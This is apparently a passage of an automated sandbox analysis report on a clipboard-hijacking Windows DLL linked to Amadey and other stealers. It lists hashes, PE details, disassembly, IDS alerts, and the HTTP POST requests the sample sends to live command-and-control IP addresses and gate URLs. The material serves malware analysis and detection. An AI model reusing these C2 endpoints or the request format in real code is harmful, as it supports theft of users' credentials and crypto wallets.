	yINR7uQlPr.exe	Get hash	malicious	Amadey, RedLine	Browse	185.81.68.147/VzCAHn.php?1DC30FADAFF92643095942
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.147/tizhyf/gate.php?0CD020845398340779059
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar	Browse	185.81.68.147/tizhyf/gate.php?2DB3A69DE7692371543510
185.81.68.148	hoPazBDFG9.dll	Get hash	malicious	Amadey	Browse	185.81.68.148/8Fvu5jh4DbS/index.php?wal=1
	tOuVwTJrau.exe	Get hash	malicious	Amadey	Browse	185.81.68.148/8Fvu5jh4DbS/index.php
	yINR7uQlPr.exe	Get hash	malicious	Amadey, RedLine	Browse	185.81.68.148/8Fvu5jh4DbS/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
KLNOPT-ASFI	hoPazBDFG9.dll	Get hash	malicious	Amadey	Browse	185.81.68.148
	tOuVwTJrau.exe	Get hash	malicious	Amadey	Browse	185.81.68.148
	eHCgK6fZc2.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	yINR7uQlPr.exe	Get hash	malicious	Amadey, RedLine	Browse	185.81.68.148
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar	Browse	185.81.68.147
	tjpq0h4wEH.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
KLNOPT-ASFI	hoPazBDFG9.dll	Get hash	malicious	Amadey	Browse	185.81.68.148
	tOuVwTJrau.exe	Get hash	malicious	Amadey	Browse	185.81.68.148
	eHCgK6fZc2.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	yINR7uQlPr.exe	Get hash	malicious	Amadey, RedLine	Browse	185.81.68.148
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar	Browse	185.81.68.147
	tjpq0h4wEH.exe	Get hash	malicious	RedLine	Browse	185.81.68.147
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.115

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.36076412023942
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	D72j5I83wU.dll
File size:	126'976 bytes
MD5:	c2f3fbbbe6d5f48a71b6b168b1485866
SHA1:	1cd56cfc2dc07880b65bd8a1f5b7147633f5d553
SHA256:	c7ed512058bc924045144daa16701da10f244ac12a5ea2de901e59dce6470839
SHA512:	e211f18c2850987529336e0d20aa894533c1f6a8ae6745e320fd394a9481d3a956c719ac29627afd783e36e5429c0325b98e60aee2a830e75323c276c72f845a
SSDEEP:	3072:Vdu5ZXB8ZuzQT7SgmME8Yn/YoZ3SNqpidU1epf:WjGymSg7E8Y3Z3AdUwpf
TLSH:	2BC34B213496C031D66D567E18A8ABF487BD6810DFB00DD77B840E7B8E642D2EE34D7A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P............................................................................@.......@.......@.~.....@.......Rich...........

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x10007062
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x675A9684 [Thu Dec 12 07:53:40 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	fdb088ba51afbf555d7a0f495212d8f1

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F2820B3F637h
call 00007F2820B3FA0Ah
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F2820B3F4E3h
add esp, 0Ch
pop ebp
retn 000Ch
jmp 00007F2820B43352h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F2820B3EBE5h
push 1001C6E0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F2820B4009Dh
int3
push ebp
mov ebp, esp
and dword ptr [1001F708h], 00000000h
sub esp, 24h
or dword ptr [1001E00Ch], 01h
push 0000000Ah
call dword ptr [10016050h]
test eax, eax
je 00007F2820B3F7DFh
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
push ebx
cpuid
mov esi, ebx
pop ebx
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
xor ecx, ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-24h]
mov edi, dword ptr [ebp-1Ch]
mov dword ptr [ebp-0Ch], eax
xor edi, 6C65746Eh
mov eax, dword ptr [ebp-18h]
xor eax, 49656E69h
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp-20h]
xor eax, 756E6547h
mov dword ptr [ebp-04h], eax
xor eax, eax
inc eax
push ebx
cpuid
mov esi, ebx
pop ebx
lea ebx, dword ptr [ebp-24h]
mov dword ptr [ebx], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [ebx+04h], esi
or eax, edi
or eax, dword ptr [ebp-08h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x1cd10	0x9c	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1cdac	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x20000	0xf8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x21000	0x1af8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1bb84	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1bbc0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x16000	0x14c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x14306	0x14400	60ab5dc3d05117ecdfe5887a3e8a7c70	False	0.5100188078703703	data	6.54336981394925	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x16000	0x752a	0x7600	08220ccdb3fd3e6b2a37ef117d10551b	False	0.4294226694915254	data	5.16092989937922	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1e000	0x1fec	0x1400	070ceab71158e4b98b9fbb2974a658d3	False	0.094140625	data	1.5445177251659354	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x20000	0xf8	0x200	9f59a1f7f3b6dfefbfe8605086b5888e	False	0.333984375	data	2.5080557656497993	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x21000	0x1af8	0x1c00	f0da6f5f3bd34741cc0954192c9cb82c	False	0.7540457589285714	data	6.518393643652914	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x20060	0x91	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.8689655172413793

Imports

DLL	Import
KERNEL32.dll	GlobalAlloc, GlobalLock, GlobalUnlock, WideCharToMultiByte, Sleep, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, SetStdHandle, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, RaiseException, InterlockedFlushSList, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetProcessHeap, GetStdHandle, GetFileType, GetStringTypeW, DecodePointer
USER32.dll	EmptyClipboard, SetClipboardData, CloseClipboard, GetClipboardData, OpenClipboard
WININET.dll	InternetOpenW, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile, InternetCloseHandle

Exports

Name	Ordinal	Address
??4CClipperDLL@@QAEAAV0@$$QAV0@@Z	1	0x10001d60
??4CClipperDLL@@QAEAAV0@ABV0@@Z	2	0x10001d60
Main	3	0x100059a0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-13T07:48:45.709940+0100	2856151	ETPRO MALWARE Amadey CnC Activity M7	1	192.168.2.11	49716	185.81.68.148	80	TCP
2024-12-13T07:48:48.330355+0100	2856151	ETPRO MALWARE Amadey CnC Activity M7	1	192.168.2.11	49723	185.81.68.148	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 07:48:42.660928965 CET	49710	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:48:42.780616045 CET	80	49710	185.81.68.147	192.168.2.11
Dec 13, 2024 07:48:42.780700922 CET	49710	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:48:42.780961037 CET	49710	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:48:42.900629044 CET	80	49710	185.81.68.147	192.168.2.11
Dec 13, 2024 07:48:44.188534975 CET	80	49710	185.81.68.147	192.168.2.11
Dec 13, 2024 07:48:44.188678980 CET	49710	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:48:44.193975925 CET	49716	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:48:44.313783884 CET	80	49716	185.81.68.148	192.168.2.11
Dec 13, 2024 07:48:44.313873053 CET	49716	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:48:44.320168972 CET	49716	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:48:44.440151930 CET	80	49716	185.81.68.148	192.168.2.11
Dec 13, 2024 07:48:45.304009914 CET	49717	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:48:45.423863888 CET	80	49717	185.81.68.147	192.168.2.11
Dec 13, 2024 07:48:45.426007032 CET	49717	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:48:45.438831091 CET	49717	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:48:45.558722019 CET	80	49717	185.81.68.147	192.168.2.11
Dec 13, 2024 07:48:45.706077099 CET	80	49716	185.81.68.148	192.168.2.11
Dec 13, 2024 07:48:45.709939957 CET	49716	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:48:46.829248905 CET	80	49717	185.81.68.147	192.168.2.11
Dec 13, 2024 07:48:46.829328060 CET	49717	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:48:46.832854986 CET	49723	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:48:46.952676058 CET	80	49723	185.81.68.148	192.168.2.11
Dec 13, 2024 07:48:46.952817917 CET	49723	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:48:46.953031063 CET	49723	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:48:47.073092937 CET	80	49723	185.81.68.148	192.168.2.11
Dec 13, 2024 07:48:48.330281019 CET	80	49723	185.81.68.148	192.168.2.11
Dec 13, 2024 07:48:48.330354929 CET	49723	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:48:49.202943087 CET	80	49710	185.81.68.147	192.168.2.11
Dec 13, 2024 07:48:49.203054905 CET	49710	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:48:50.719304085 CET	80	49716	185.81.68.148	192.168.2.11
Dec 13, 2024 07:48:50.719364882 CET	49716	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:48:51.843630075 CET	80	49717	185.81.68.147	192.168.2.11
Dec 13, 2024 07:48:51.843749046 CET	49717	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:48:53.329134941 CET	80	49723	185.81.68.148	192.168.2.11
Dec 13, 2024 07:48:53.329267025 CET	49723	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:50:32.626494884 CET	49716	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:50:32.630414009 CET	49710	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:50:33.063533068 CET	49710	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:50:33.063548088 CET	49716	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:50:33.702119112 CET	49716	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:50:33.751040936 CET	49710	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:50:34.954152107 CET	49716	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:50:35.064604044 CET	49710	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:50:35.267195940 CET	49723	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:50:35.267206907 CET	49717	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:50:35.751131058 CET	49717	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:50:35.766686916 CET	49723	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:50:36.563519955 CET	49723	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:50:36.563536882 CET	49717	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:50:37.563508034 CET	49710	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:50:37.563523054 CET	49716	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:50:37.860398054 CET	49717	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:50:37.954160929 CET	49723	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:50:40.454149961 CET	49723	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:50:40.563510895 CET	49717	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:50:42.563520908 CET	49710	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:50:42.563528061 CET	49716	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:50:45.413139105 CET	49723	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:50:45.752024889 CET	49717	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:50:52.360394001 CET	49710	80	192.168.2.11	185.81.68.147
Dec 13, 2024 07:50:52.566028118 CET	49716	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:50:55.458013058 CET	49723	80	192.168.2.11	185.81.68.148
Dec 13, 2024 07:50:56.065011024 CET	49717	80	192.168.2.11	185.81.68.147

HTTP Request Dependency Graph

185.81.68.147

185.81.68.148

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49710	185.81.68.147	80	7612	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:42.780961037 CET	156	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Dec 13, 2024 07:48:44.188534975 CET	711	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:43 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 512 Content-Type: text/html; charset=UTF-8 Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED] Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49716	185.81.68.148	80	7612	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:44.320168972 CET	159	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Dec 13, 2024 07:48:45.706077099 CET	711	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:44 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 512 Content-Type: text/html; charset=UTF-8 Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED] Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.11	49717	185.81.68.147	80	7760	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:45.438831091 CET	156	OUT	POST /7vhfjke3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.147 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Dec 13, 2024 07:48:46.829248905 CET	711	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:46 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 512 Content-Type: text/html; charset=UTF-8 Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED] Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.11	49723	185.81.68.148	80	7760	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 07:48:46.953031063 CET	159	OUT	POST /8Fvu5jh4DbS/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.81.68.148 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Dec 13, 2024 07:48:48.330281019 CET	711	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:48:47 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 512 Content-Type: text/html; charset=UTF-8 Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED] Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-

Target ID:	0
Start time:	01:48:35
Start date:	13/12/2024
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll"
Imagebase:	0x230000
File size:	126'464 bytes
MD5 hash:	51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:48:35
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff68cce0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	01:48:35
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1
Imagebase:	0xc30000
File size:	236'544 bytes
